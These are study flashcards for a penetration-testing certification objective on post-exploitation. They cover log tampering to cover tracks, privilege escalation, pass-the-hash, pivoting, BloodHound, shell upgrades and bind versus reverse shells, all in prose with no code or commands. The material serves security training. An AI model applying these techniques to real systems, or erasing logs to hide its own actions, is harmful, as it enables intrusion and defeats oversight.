3.7 Attacks and Exploits Flashcards
Given a scenario, perform post-exploitation techniques.
How can you cover your tracks?
You can cover your tracks by clearing or altering log entries or removing specific entries, modifying timestamps, removing history or by shredding files entirely.
What does the structure of Active Directory (AD) look like?
Forest
↓
A Tree is formed with a collection of (sub)domains
↓
Organizational Units (OU) are used within a domain to group similar objects such as users, groups, computers and other OUs and are used to minimize the number of domains
What is Horizontal Privilege Escalation?
Horizontal PrivEsc is obtaining access to a regular user account with different access or permissions than the one currently in use. This approach has great potential for information gathering without raising suspicion
What is Vertical Privilege Escalation?
Vertical PrivEsc is obtaining access to an account of higher privilege than the one we currently have to enable resources that the regular user does not have permission for.
How can you upgrade a restrictive shell?
In Windows, you could create a text file with the lines necessary to launch FTP with it as a script and download Meterpreter from the attacker machine. In Linux, depending on distribution and implementation, it can be as simple as launching bash in interactive mode
What is BloodHoundAD?
BloodHoundAD is an exploiting tool for Active Directory (AD) that can quickly explore AD trust relationships, abusable rights on AD objects, security group memberships, SQL admin links and more.
What is the difference between Pivoting and Lateral Movement?
Pivoting is a process similar to Lateral Movement. In Lateral Movement, you jump from one host to the next in search of vulnerabilities to exploit. This can be done using, for example, Remote Access- or Remote Management Services. When you Pivot, you compromise one host (the pivot) that enables you to spread out to other hosts that would otherwise be inaccessible. You can do this with Port forwarding, VPN pivoting, SSH pivoting or Modifying routing tables.
What is a pass the hash attack?
A pass the hash attack is when you log on to a target OS or application providing the username and the hash of the password, rather than the password itself. You obtain the hash by inducing the OS or application to dump them from RAM, the Windows Registry or a credentials file.
What are some common methods for PrivEsc in Windows?
-Target logins and/or dump passwords
-Compromise applications to gain access to a workstation and/or escalate privileges
-Bypass local UAC
-Find processes with weak controls and inject malicious code
-Search for sensitive information in shared folders
-DLL hijacking
-Search for missing patches and misconfigurations
What are some common methods for PrivEsc in Linux?
-Obtain a copy of passwd/shadow files to crack passwords
-Find processes with weak controls and inject malicious code
-Compromise end user applications
-Locate applications you can run as root
-Locate and compromise services owned by root
-Search for sensitive information in shared folders
-Find exploits that target the kernel and privileged services
-Try upgrading your shell
-Exploit badly configured cron jobs to gain root access
-Search for missing patches and misconfigurations
What is the difference between a Bind shell and a Reverse shell?
A Bind shell is established when the target system “binds” its shell to a local network port. The attack machine would then use Netcat to connect to this session and obtain the shell.
A Reverse shell is established when the target machine communicates with an attack machine that is listening on a specific port. Here you start the listener on the attack machine, then start the connection on the target machine and the attack machine’s listener will accept the incoming connection and open a shell onto the target system.